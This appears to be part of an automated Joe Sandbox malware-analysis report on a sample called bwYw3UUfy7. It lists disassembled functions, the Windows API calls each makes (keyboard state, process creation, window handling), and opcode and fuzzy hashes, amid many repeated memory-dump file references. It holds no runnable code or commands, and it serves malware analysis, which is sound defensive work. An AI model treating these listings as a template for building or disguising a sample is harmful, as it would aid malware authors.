Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 52bc2da04868eb9b322a1e90f98d8600b218d06e411fee00acde3c445491ae37
Instruction ID: 9436ac78fdbbd2a354535c045c6c042e9ad25e25a61adb3d93d7ba5c4da5c04b
Opcode Fuzzy Hash: 52bc2da04868eb9b322a1e90f98d8600b218d06e411fee00acde3c445491ae37
Instruction Fuzzy Hash: 8501F233600158ABDF54DF28D80DFFA3BA1AFA2721F14416CF6591B1A1C339AC60D7A0

Function 007C8AAA Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00749BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00749BB2

Part of subcall function 0074912D: GetCursorPos.USER32(?), ref: 00749141
Part of subcall function 0074912D: ScreenToClient.USER32(00000000,?), ref: 0074915E
Part of subcall function 0074912D: GetAsyncKeyState.USER32(00000001), ref: 00749183
Part of subcall function 0074912D: GetAsyncKeyState.USER32(00000002), ref: 0074919D

NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,00787818,?,?,?,?,?,00000001,?), ref: 007C8AF8

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
String ID:
API String ID: 2356834413-0
Opcode ID: 454fa9a90f3df8559187b973ad1f5eff486449c26b6c52d12dd06630258d1767
Instruction ID: 40ab71472e2a5ebdc8139b564bcf311dbfd5df76fd644e5c9f3957dda3dd3915
Opcode Fuzzy Hash: 454fa9a90f3df8559187b973ad1f5eff486449c26b6c52d12dd06630258d1767
Instruction Fuzzy Hash: ADF03770200219EBDF556F15DC1EEBF3F65FB007A1F00401AF9161A291DBBA99A0DBE5

Function 00749052 Relevance: 1.5, APIs: 1, Instructions: 27nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00749BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00749BB2

NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?), ref: 00749096

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: e269e20ade2754558971f5b94d4649f6af8b9a183eb193bcc5382a41da240101
Instruction ID: feba9b268567fc0717a71043471c0a95fc2b65589f4014c7a80e6cc0b9083e9e
Opcode Fuzzy Hash: e269e20ade2754558971f5b94d4649f6af8b9a183eb193bcc5382a41da240101
Instruction Fuzzy Hash: 31F08230600209DFDF58CF15E859A773B62FB41360F20812CF9120A2E0C7379AA1DB60

Function 007C9380 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 007C93C0

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: c604af84a2870bb1c583e2a66051d07780bed3c463ca72a2ff031c46dc795c72
Instruction ID: 391a4d73d9b7c45393ff3e0ec539671d9b136003241cfffaf9321165b999ba53
Opcode Fuzzy Hash: c604af84a2870bb1c583e2a66051d07780bed3c463ca72a2ff031c46dc795c72
Instruction Fuzzy Hash: 56F06D31200298AFDB21DF58DC09FC67BA5EB05360F14801CFA25672E1CB757A60D764

Function 007490A7 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00749BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00749BB2

NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 007490D5

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: cf183ad181b33819bc2a44b0c02072081b8d109f24ca2867c95a22a29937f8cd
Instruction ID: 4c6215bef480a2cc7d2cc7d06a8d476cb4dc16f0c8a19637845b1fc5016a2bc3
Opcode Fuzzy Hash: cf183ad181b33819bc2a44b0c02072081b8d109f24ca2867c95a22a29937f8cd
Instruction Fuzzy Hash: 4FE0EC35640208FBDF55AF90EC5AE653B26FB49360F108018FB155A2A1CB37AA61DB54

Function 007C93CB Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,?,?,?,00787723,?,?,?,?,?,?), ref: 007C93F6

Part of subcall function 007C8172: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00803018,0080305C), ref: 007C81BF
Part of subcall function 007C8172: CloseHandle.KERNEL32 ref: 007C81D1

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: CloseCreateDialogHandleNtdllProc_Process
String ID:
API String ID: 4178364262-0
Opcode ID: 3e70547c8dee0f2671b9e97774ea478d10388cd092077f8b1808ed8434628f32
Instruction ID: b9168d0035aeb7a74bfe69da96b47c546cad9bfccd590f7949a5658b8b77dda1
Opcode Fuzzy Hash: 3e70547c8dee0f2671b9e97774ea478d10388cd092077f8b1808ed8434628f32
Instruction Fuzzy Hash: 55E01231100208DFCB42AF04E859E863BB2FB08351F00404CFA15172B2CB36A9A0EF10

Function 00748BA4 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00749BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00749BB2

Part of subcall function 00748BCD: DestroyWindow.USER32(?), ref: 00748C81
Part of subcall function 00748BCD: KillTimer.USER32(00000000,?,?,?,?,00748BBA,00000000,?), ref: 00748D1B

NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?), ref: 00748BC3

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Window$DestroyDialogKillLongNtdllProc_Timer
String ID:
API String ID: 2797419724-0
Opcode ID: 7c7413c798aa51faa267380026881e473e749f6b72461adf0e9759d0145cac16
Instruction ID: dba4150ea0cb29f030ef4c9f90c3c272725f161f5469bedf6b9538df4a203bca
Opcode Fuzzy Hash: 7c7413c798aa51faa267380026881e473e749f6b72461adf0e9759d0145cac16
Instruction Fuzzy Hash: 0AD012B024030CBBEE512BA0EC0FF4A3A19DB007A0F10C024F704791D1CB7665609559

Function 007509D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(007509E1,007503EE), ref: 007509DA

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: fc0c5750bbc73c609106d27d175087b132086413015a527257a8455a882e12a9
Instruction ID: e65aa12278c6f33e46349fb82630112ff911b3fb8ab33a0b0e46ab88aed1af08
Opcode Fuzzy Hash: fc0c5750bbc73c609106d27d175087b132086413015a527257a8455a882e12a9
Instruction Fuzzy Hash:

Function 0075781B Relevance: 1.4, Strings: 1, Instructions: 171COMMON

Download Yara Rule

Strings

0, xrefs: 0075798B

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: d982238468b4304146f892ead76334e5164c16c7b6bdb10d454b5b952a6a12e3
Instruction ID: b5899ff553b2d3ff7986ef5a9550f39880bde3c7641eb400d4ca50b11e248f83
Opcode Fuzzy Hash: d982238468b4304146f892ead76334e5164c16c7b6bdb10d454b5b952a6a12e3
Instruction Fuzzy Hash: E9514B6160C7459BEB3C8968A45ABFF639A9B52302F180509DC8297282C7DDFE0ED361

Function 00737920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0116b60c50d8178a3b0e0598c0c0a351b1d0f58feffa678a8242035368bd548
Instruction ID: 1e5829cdc29a8daa9a014e3f733c2b07126b2131b4fb909a89ea1d2766efb596
Opcode Fuzzy Hash: f0116b60c50d8178a3b0e0598c0c0a351b1d0f58feffa678a8242035368bd548
Instruction Fuzzy Hash: 7C22B3B0A04609DFEF14CF64C885AEEB7F5FF44340F248529E816A7292EB79AD15CB50

Function 007391C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76d232bf97d76c1a82c6229da84264d7fc19c4255c46cfe916353c17fc7903f8
Instruction ID: b2dbc1a2285066c7907021e02b2958468eaee72da732f5f9aaebc2289d5506b0
Opcode Fuzzy Hash: 76d232bf97d76c1a82c6229da84264d7fc19c4255c46cfe916353c17fc7903f8
Instruction Fuzzy Hash: E602C7B0E00105EBDF05DF64D885AAEB7B1FF48340F11C169E91A9B291EB79EE10CB91

Function 00751C77 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 69b40d536ced43718586e59c83e1c9848cc5eec96f1899a325f36621d453d723
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 319187322081E34ADB29423A85352BEFFF15A523A375A079DDCF2CA1C5FE58995CD620

Function 00751F32 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: fb34f37064d2c75cfbe8d209a96c0748f914e0bf60a987ad1cfc93285308b5cb
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: C99186722090E309DB6D423984741BEFFE15A933A371A079DDCF2CB1C6EE68995DD620

Function 007519B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 1eb23b498ab860ce9111aa7ffe7f64fba8e8b159eda65a01aa3809a5c4d2ddda
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: C691C8722090E34EDB2E427A84741BDFFE15A923A335A479DD8F2CA1C1FE98D55CD620

Function 00757A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c0dcc0172331f13e59d86dd9065daf0455ff50c45b1a55b7f950d77ea473249
Instruction ID: c6289d24472b6e5fdab02f6fed93dbfb72c8ed4106c6fd9a53bf4fbf68feaa74
Opcode Fuzzy Hash: 4c0dcc0172331f13e59d86dd9065daf0455ff50c45b1a55b7f950d77ea473249
Instruction Fuzzy Hash: 8D6159B160874997EA3C592CB899BFE2398DF41303F144919EC42DB281DADD9E4EC396

Function 00751706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 9d35b13dcb4c589e181dc065e38b6d5d6275db189b83c0a230b54187fe861755
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: F88177725080E309DB2D423D85346BEFFE15A923B375A079DD8F2CA1C1EE98A95CD620

Function 017205B0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1324703265.000000000171D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0171D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_171d000_bwYw3UUfy7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: 982a854d2b078c61ce5786749db57a92b12008aa5e36005c30de7bc53738aa39
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 2241C471D1051CDBCF48CFADC991AAEFBF1AF88201F548299D516AB345D730AB41DB50

Function 01720440 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

